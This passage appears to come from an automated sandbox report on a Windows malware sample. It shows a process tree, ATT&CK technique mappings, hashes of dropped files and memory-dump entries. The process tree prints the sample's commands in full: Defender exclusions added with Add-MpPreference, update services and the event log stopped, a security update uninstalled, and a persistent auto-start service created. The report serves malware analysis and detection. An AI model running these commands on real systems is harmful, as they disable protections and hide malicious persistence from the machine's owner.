      - C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
        
        C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
        6⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4648
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
        6⤵
        
        PID:3168
        
        C:\Windows\system32\wusa.exe
        
        wusa /uninstall /kb:890830 /quiet /norestart
        7⤵
        
        PID:1468
      - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop UsoSvc
        6⤵
        Launches sc.exe
        
        PID:3800
      - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop WaaSMedicSvc
        6⤵
        Launches sc.exe
        
        PID:1724
      - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop wuauserv
        6⤵
        Launches sc.exe
        
        PID:404
      - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop bits
        6⤵
        Launches sc.exe
        
        PID:4116
      - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop dosvc
        6⤵
        Launches sc.exe
        
        PID:5000
      - C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:4360
      - C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:4124
      - C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:4964
      - C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:4544
      - C:\Windows\system32\dialer.exe
        
        C:\Windows\system32\dialer.exe
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:1500
      - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe delete "AHIMMUFK"
        6⤵
        Launches sc.exe
        
        PID:1484
      - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe create "AHIMMUFK" binpath= "C:\ProgramData\xlffyhztkvzk\pkiwizgebqxq.exe" start= "auto"
        6⤵
        Launches sc.exe
        
        PID:4128
      - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop eventlog
        6⤵
        Launches sc.exe
        
        PID:4688
      - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe start "AHIMMUFK"
        6⤵
        Launches sc.exe
        
        PID:2912
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        7⤵
        
        PID:2484
    - - C:\Windows\explorer.exe
        
        "C:\Windows\explorer.exe"
        5⤵
        
        PID:2068
    - - C:\Windows\system32\WerFault.exe
        
        C:\Windows\system32\WerFault.exe -u -p 5068 -s 3136
        5⤵
        
        PID:4680

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3776

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:3568
- C:\Windows\system32\WerFault.exe
  C:\Windows\system32\WerFault.exe -u -p 3568 -s 832
  2⤵
  PID:2420

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservice -s CDPSvc
1⤵
PID:4752

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -s DsmSvc
1⤵
- Modifies data under HKEY_USERS
PID:4584

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localserviceandnoimpersonation -s SSDPSRV
1⤵
PID:4632

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -s WinHttpAutoProxySvc
1⤵
- Modifies data under HKEY_USERS
PID:3332

C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
1⤵
- Modifies data under HKEY_USERS
PID:3152

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s wlidsvc
1⤵
PID:2752

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:4468

C:\Windows\system32\ApplicationFrameHost.exe
C:\Windows\system32\ApplicationFrameHost.exe -Embedding
1⤵
PID:4464

C:\Windows\System32\InstallAgent.exe
C:\Windows\System32\InstallAgent.exe -Embedding
1⤵
PID:1328

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}
1⤵
PID:2832

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k WerSvcGroup
1⤵
PID:3620

C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
1⤵
PID:1808

C:\ProgramData\xlffyhztkvzk\pkiwizgebqxq.exe
C:\ProgramData\xlffyhztkvzk\pkiwizgebqxq.exe
1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Checks processor information in registry
- Modifies data under HKEY_USERS
PID:216

C:\Windows\explorer.exe
C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
1⤵
PID:2872

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k WerSvcGroup
1⤵
PID:1968

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Scripting

T1064

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Defense Evasion

Impair Defenses

T1562

Scripting

T1064

Credential Access

Discovery

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\Microsoft\Windows\WER\Temp\WER9125.tmp.csv

Filesize
39KB

MD5
d2c63f8e7671c125aa1bd468d7cd441a

SHA1
73710b083c898692404ea922bb4645e3f60772d4

SHA256
e39a19ff8e7aa6937c9f12ec01eb78bde3f5b2d6e815890ae2c61989ce42f2f7

SHA512
8c707ee35407d560ade03bac807999f9a72a40a20e11a1d2ea17c5384605005586c6b67bae42a71cd5c7d79d6b33f1b0b88b25660693881925855ac2f5160937

Download Submit
C:\ProgramData\Microsoft\Windows\WER\Temp\WER925E.tmp.txt

Filesize
12KB

MD5
78b9444b09e58b0a5071506d71d95891

SHA1
8bd931a4e3e4d322c8586ef9ad5fa0846e5bf456

SHA256
532a0adc7d4bc40c09b548111666700188b7fa327810559a115350ee2d819070

SHA512
3dbb8115178bc2fc4c4697f1b10254c76a321988db1ba4512275f32dbde34c04fabf6ec63f2795529c1f2148f8b3240b7f906c7aa0975f71b8bf7dd107459122

Download Submit
C:\ProgramData\Microsoft\Windows\WER\Temp\WERBD05.tmp.txt

Filesize
12KB

MD5
3b12ebf232d220c8375cb84b3e0bd8ef

SHA1
9b8c30005925045a6c978623608174c8c95b6117

SHA256
479c3f40463ec18ac14c7f6781740906938c495f86e42bdca84f6db9c9f43e1a

SHA512
084e98f56c9b73e6bff5abccda07a4f20024ee5cfd29cc70367ddd12865dfd146c1e4fc65b22fc90b92b35ab09efe798e3d37b66f5996e5b3c7c3b07e0a90037

Download Submit
C:\ProgramData\xlffyhztkvzk\pkiwizgebqxq.exe

Filesize
1.8MB

MD5
6007b21902bd7f35b64a1a773549bb3e

SHA1
46d110878578d2c3e878ad44ecedfb040ec38c82

SHA256
8f4ccd6cb19a4c5d487fa1d06ea4ad4ee29e087cddc48aa9fac69be9f537e840

SHA512
56679e2f766f9250526a8f15857c210653621bf4608da5738e1c80f4739699fef0c2a411ad8482b630d1c8c413fcde933195aff81fbee9e7537a833687519363

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\CasPol.exe.log

Filesize
321B

MD5
d96cb6a55eb71b30f2e8a725ef5e6e5d

SHA1
f0bef03d7f37dfee965c6dfe4f6f447e3ab34be0

SHA256
253f84939770e1b5663cecd7df61bb04c1668c1a5f90a6dd2b95ea6830f8977b

SHA512
e65e8ee91233d4179beff6d381c07a600a0905710feaa063d9880c48646bd296137efdf628caecb8ccecec20162c2c952e9713d1d629788a37f1afba09bf4b77

Download Submit
C:\Users\Admin\AppData\Local\ServiceHub\CasPol.exe

Filesize
105KB

MD5
ac93f60717f1fee8c678e624f54852ee

SHA1
d9c9828396d19a7f2920af68a4692409f16beaa9

SHA256
1fa79bf14d80519f7965a44dcc1f69ec1d24e83eea2927b474c3545e65062f24

SHA512
9ff7dfe9c8bc2ae775a97227990f332d8b799fbb4235eea7c73756a5359841d355805d1b624b40fe8f7e864c997a604d3c10ad1fa1182deb5842ab77aad9b1b7

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ja0ygohu.tvg.ps1

Filesize
1B

MD5
c4ca4238a0b923820dcc509a6f75849b

SHA1
356a192b7913b04c54574d18c28d46e6395428ab

SHA256
6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

SHA512
4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

Download Submit
C:\Users\Admin\AppData\Local\Temp\ftbskc.exe

Filesize
393KB

MD5
3f3a51617811e9581aba50376599efa6

SHA1
9b26aa73f43a4db9b216b90d1aa3e2e4d602fde8

SHA256
5f3403e13e316d9320d46233e9f62b183623c46ec80c6c55139efdd72c5ada37

SHA512
9ad5cfb29281dd462b726c7ee239926f83050181fe4f6c3e9057e51df65ae7f850cecbf1cb453287720314275335df36bb8d5299d09a1f73329a5b9292db3ee3

Download Submit
C:\Users\Admin\AppData\Local\Temp\sovthz.exe

Filesize
756KB

MD5
d76027fe4cfd48c7f8999c796e50e731

SHA1
5026422e84bf445e2d141529e2b808187a30d9f6

SHA256
148da274864c690a7c01119e025bdc0ab94fa9c110c30afb42e51b1c990a2799

SHA512
2e2c4a5319a61555913648702ddcfb8b40d548dcfda1a536a2e85f9cb85d25d9a463743dc866f86b4de99fd10f9c402def424b9e8a203189518f45e924b89d2d

Download Submit
C:\Users\Admin\AppData\Local\Temp\tdmyff.exe

Filesize
3.1MB

MD5
86e00d529b3b454a84b942ac916211e3

SHA1
021c733e5448436b384bf0d3a0ba81f4d0d93f9a

SHA256
30e01b261cb5d7524a303cdbe9d177fc05d74279642e4a87b46ee70045e68d53

SHA512
9a08379b35a3bf1699b925c6dbfc6e85123f1155e567929eaff3683e5e9f196a16775e3a2f6a7585f7c0f0f201ef4be009cda5cf94b160742642145837c3de1e

Download Submit
C:\Users\Admin\AppData\Local\Temp\zlftge.exe

Filesize
16.5MB

MD5
d01b812c108576056594805b6e9e7064

SHA1
290fc3e50cf13a1595f1ba3357285153ac98834d

SHA256
9a6ac9acc3267fc22ecd8872e3e9d863dce608d609ee06fb0769b599ce669ec4

SHA512
d3709b4a6760e149bcd774f7648857a47161e7144530e3d1ae700b33861837d494d646bb8accd3980b3ccb955682c9c1ebe2c3f22371fb9566f669c48fb09be4

Download Submit
memory/1208-402-0x0000000000400000-0x000000000040A000-memory.dmp

Filesize
40KB

Download
memory/1500-767-0x0000000140000000-0x000000014002B000-memory.dmp

Filesize
172KB

Download
memory/1500-769-0x0000000140000000-0x000000014002B000-memory.dmp

Filesize
172KB

Download
memory/1500-772-0x0000000140000000-0x000000014002B000-memory.dmp

Filesize
172KB

Download
memory/1500-768-0x0000000140000000-0x000000014002B000-memory.dmp

Filesize
172KB

Download
memory/1500-770-0x0000000140000000-0x000000014002B000-memory.dmp

Filesize
172KB

Download
memory/1568-20-0x00000000732D0000-0x00000000739BE000-memory.dmp

Filesize
6.9MB

Download
memory/1568-6-0x0000000000400000-0x000000000040E000-memory.dmp

Filesize
56KB

Download
memory/1568-8-0x00000000732D0000-0x00000000739BE000-memory.dmp

Filesize
6.9MB

Download
memory/1568-7-0x0000000004D00000-0x0000000004D9C000-memory.dmp

Filesize
624KB

Download
memory/1568-10-0x0000000004F50000-0x0000000004F60000-memory.dmp

Filesize
64KB

Download
memory/1568-13-0x0000000006C70000-0x000000000716E000-memory.dmp

Filesize
5.0MB

Download
memory/1568-12-0x00000000066D0000-0x0000000006762000-memory.dmp

Filesize
584KB

Download
memory/1568-9-0x0000000004C60000-0x0000000004CC6000-memory.dmp

Filesize
408KB

Download
memory/2616-258-0x0000000000400000-0x000000000043E000-memory.dmp

Filesize
248KB

Download
memory/2616-254-0x0000000000400000-0x000000000043E000-memory.dmp

Filesize
248KB

Download
memory/2872-58-0x0000023FF0790000-0x0000023FF0798000-memory.dmp

Filesize
32KB

Download
memory/2872-261-0x00007FFD4F4D0000-0x00007FFD4F503000-memory.dmp

Filesize
204KB

Download
memory/2872-33-0x0000023FD6610000-0x0000023FD6620000-memory.dmp

Filesize
64KB

Download
memory/2872-34-0x0000023FF1690000-0x0000023FF16C0000-memory.dmp

Filesize
192KB

Download
memory/2872-35-0x0000023FF1DB0000-0x0000023FF1E6A000-memory.dmp

Filesize
744KB

Download
memory/2872-37-0x0000023FF06D0000-0x0000023FF06F2000-memory.dmp

Filesize
136KB

Download
memory/2872-36-0x0000023FF1B10000-0x0000023FF1B70000-memory.dmp

Filesize
384KB

Download
memory/2872-38-0x0000023FF1F30000-0x0000023FF22F5000-memory.dmp

Filesize
3.8MB

Download
memory/2872-39-0x0000023FF0780000-0x0000023FF079E000-memory.dmp

Filesize
120KB

Download
memory/2872-40-0x0000023FF1B10000-0x0000023FF1B8C000-memory.dmp

Filesize
496KB

Download
memory/2872-41-0x0000023FF1B10000-0x0000023FF1BAC000-memory.dmp

Filesize
624KB

Download
memory/2872-42-0x0000023FF06D0000-0x0000023FF06D8000-memory.dmp

Filesize
32KB

Download
memory/2872-43-0x0000023FF06D0000-0x0000023FF06DE000-memory.dmp

Filesize
56KB

Download
memory/2872-45-0x0000023FF1880000-0x0000023FF18A2000-memory.dmp

Filesize
136KB

Download
memory/2872-44-0x0000023FF06D0000-0x0000023FF06D8000-memory.dmp

Filesize
32KB

Download
memory/2872-46-0x0000023FF1780000-0x0000023FF179A000-memory.dmp

Filesize
104KB

Download
memory/2872-47-0x0000023FF06D0000-0x0000023FF06DA000-memory.dmp

Filesize
40KB

Download
memory/2872-48-0x0000023FF1780000-0x0000023FF1792000-memory.dmp

Filesize
72KB

Download
memory/2872-49-0x0000023FF1780000-0x0000023FF17A0000-memory.dmp

Filesize
128KB

Download
memory/2872-50-0x0000023FF1F30000-0x0000023FF1FE0000-memory.dmp

Filesize
704KB

Download
memory/2872-51-0x0000023FF26D0000-0x0000023FF2846000-memory.dmp

Filesize
1.5MB

Download
memory/2872-52-0x0000023FF1B10000-0x0000023FF1B32000-memory.dmp

Filesize
136KB

Download
memory/2872-53-0x0000023FF2BE0000-0x0000023FF2DE8000-memory.dmp

Filesize
2.0MB

Download
memory/2872-54-0x0000023FF0790000-0x0000023FF07A0000-memory.dmp

Filesize
64KB

Download
memory/2872-55-0x0000023FF1B10000-0x0000023FF1B3A000-memory.dmp

Filesize
168KB

Download
memory/2872-57-0x0000023FF0790000-0x0000023FF0798000-memory.dmp

Filesize
32KB

Download
memory/2872-56-0x0000023FF0790000-0x0000023FF0798000-memory.dmp

Filesize
32KB

Download
memory/2872-31-0x0000023FF1A90000-0x0000023FF1BB2000-memory.dmp

Filesize
1.1MB

Download
memory/2872-60-0x0000023FF0790000-0x0000023FF0798000-memory.dmp

Filesize
32KB

Download
memory/2872-59-0x0000023FF0790000-0x0000023FF0798000-memory.dmp

Filesize
32KB

Download
memory/2872-61-0x0000023FF0790000-0x0000023FF0798000-memory.dmp

Filesize
32KB

Download
memory/2872-62-0x0000023FF1E20000-0x0000023FF1E6A000-memory.dmp

Filesize
296KB

Download
memory/2872-63-0x0000023FF0790000-0x0000023FF07A0000-memory.dmp

Filesize
64KB

Download
memory/2872-64-0x0000023FF1B10000-0x0000023FF1B30000-memory.dmp

Filesize
128KB

Download
memory/2872-65-0x0000023FF0790000-0x0000023FF0798000-memory.dmp

Filesize
32KB

Download
memory/2872-66-0x0000023FF0790000-0x0000023FF0798000-memory.dmp

Filesize
32KB

Download
memory/2872-67-0x0000023FF0790000-0x0000023FF0798000-memory.dmp

Filesize
32KB

Download
memory/2872-69-0x0000023FF2090000-0x0000023FF20F4000-memory.dmp

Filesize
400KB

Download
memory/2872-68-0x0000023FF0790000-0x0000023FF0798000-memory.dmp

Filesize
32KB

Download
memory/2872-30-0x0000023FF0780000-0x0000023FF079A000-memory.dmp

Filesize
104KB

Download
memory/2872-29-0x0000023FF1720000-0x0000023FF17C4000-memory.dmp

Filesize
656KB

Download
memory/2872-32-0x0000023FF16E0000-0x0000023FF1724000-memory.dmp

Filesize
272KB

Download
memory/2872-271-0x0000023FF0680000-0x0000023FF0694000-memory.dmp

Filesize
80KB

Download
memory/2872-273-0x0000023FF1550000-0x0000023FF1588000-memory.dmp

Filesize
224KB

Download
memory/2872-275-0x00007FFD49C70000-0x00007FFD49DA4000-memory.dmp

Filesize
1.2MB

Download
memory/2872-281-0x00007FFD49C70000-0x00007FFD49DA8000-memory.dmp

Filesize
1.2MB

Download
memory/2872-288-0x00007FFD4F2B0000-0x00007FFD4F2CC000-memory.dmp

Filesize
112KB

Download
memory/2872-293-0x00007FFD4F2B0000-0x00007FFD4F2CB000-memory.dmp

Filesize
108KB

Download
memory/2872-297-0x00007FFD4EF30000-0x00007FFD4EF52000-memory.dmp

Filesize
136KB

Download
memory/2872-307-0x00007FFD4F2B0000-0x00007FFD4F2CD000-memory.dmp

Filesize
116KB

Download
memory/2872-28-0x0000023FF17D0000-0x0000023FF192A000-memory.dmp

Filesize
1.4MB

Download
memory/2872-27-0x0000023FF0780000-0x0000023FF0798000-memory.dmp

Filesize
96KB

Download
memory/2872-19-0x0000023FD6170000-0x0000023FD617E000-memory.dmp

Filesize
56KB

Download
memory/2872-21-0x00007FFD3E920000-0x00007FFD3F30C000-memory.dmp

Filesize
9.9MB

Download
memory/2872-22-0x0000023FF0700000-0x0000023FF0710000-memory.dmp

Filesize
64KB

Download
memory/2872-23-0x0000023FD65F0000-0x0000023FD65FA000-memory.dmp

Filesize
40KB

Download
memory/2872-24-0x0000023FD6610000-0x0000023FD662C000-memory.dmp

Filesize
112KB

Download
memory/2872-25-0x0000023FD6610000-0x0000023FD6624000-memory.dmp

Filesize
80KB

Download
memory/2872-26-0x0000023FD6610000-0x0000023FD6620000-memory.dmp

Filesize
64KB

Download
memory/4176-0-0x0000018FB8890000-0x0000018FB88A6000-memory.dmp

Filesize
88KB

Download
memory/4176-1-0x00007FFD3E920000-0x00007FFD3F30C000-memory.dmp

Filesize
9.9MB

Download
memory/4176-2-0x0000018FD2EE0000-0x0000018FD2EF0000-memory.dmp

Filesize
64KB

Download
memory/4176-3-0x0000018FD4C40000-0x0000018FD4CB6000-memory.dmp

Filesize
472KB

Download
memory/4176-4-0x0000018FD2FF0000-0x0000018FD300E000-memory.dmp

Filesize
120KB

Download
memory/4176-5-0x0000018FD3010000-0x0000018FD3074000-memory.dmp

Filesize
400KB

Download
memory/4176-11-0x00007FFD3E920000-0x00007FFD3F30C000-memory.dmp

Filesize
9.9MB

Download
memory/4228-489-0x0000000140000000-0x00000001402CA000-memory.dmp

Filesize
2.8MB

Download
memory/4228-487-0x0000000140000000-0x00000001402CA000-memory.dmp

Filesize
2.8MB

Download
memory/5016-462-0x00007FFD4E8E0000-0x00007FFD4E8FD000-memory.dmp

Filesize
116KB

Download
memory/5016-424-0x000001CF2D240000-0x000001CF2D254000-memory.dmp

Filesize
80KB

Download
memory/5016-452-0x00007FFD4EF10000-0x00007FFD4EF32000-memory.dmp

Filesize
136KB

Download
memory/5016-446-0x00007FFD4EF20000-0x00007FFD4EF3B000-memory.dmp

Filesize
108KB

Download
memory/5016-441-0x00007FFD4EF20000-0x00007FFD4EF3C000-memory.dmp

Filesize
112KB

Download
memory/5016-428-0x00007FFD3A3E0000-0x00007FFD3A514000-memory.dmp

Filesize
1.2MB

Download
memory/5024-390-0x0000000140000000-0x0000000140058000-memory.dmp

Filesize
352KB

Download
memory/5024-389-0x0000000140000000-0x0000000140058000-memory.dmp

Filesize
352KB

Download
memory/5024-388-0x0000000140000000-0x0000000140058000-memory.dmp

Filesize
352KB

Download
memory/5024-392-0x0000000140000000-0x0000000140058000-memory.dmp

Filesize
352KB

Download
memory/5024-397-0x0000000140000000-0x0000000140058000-memory.dmp

Filesize
352KB

Download
memory/5068-549-0x0000022F50940000-0x0000022F50973000-memory.dmp

Filesize
204KB

Download
memory/5068-563-0x0000022F515F0000-0x0000022F51628000-memory.dmp

Filesize
224KB

Download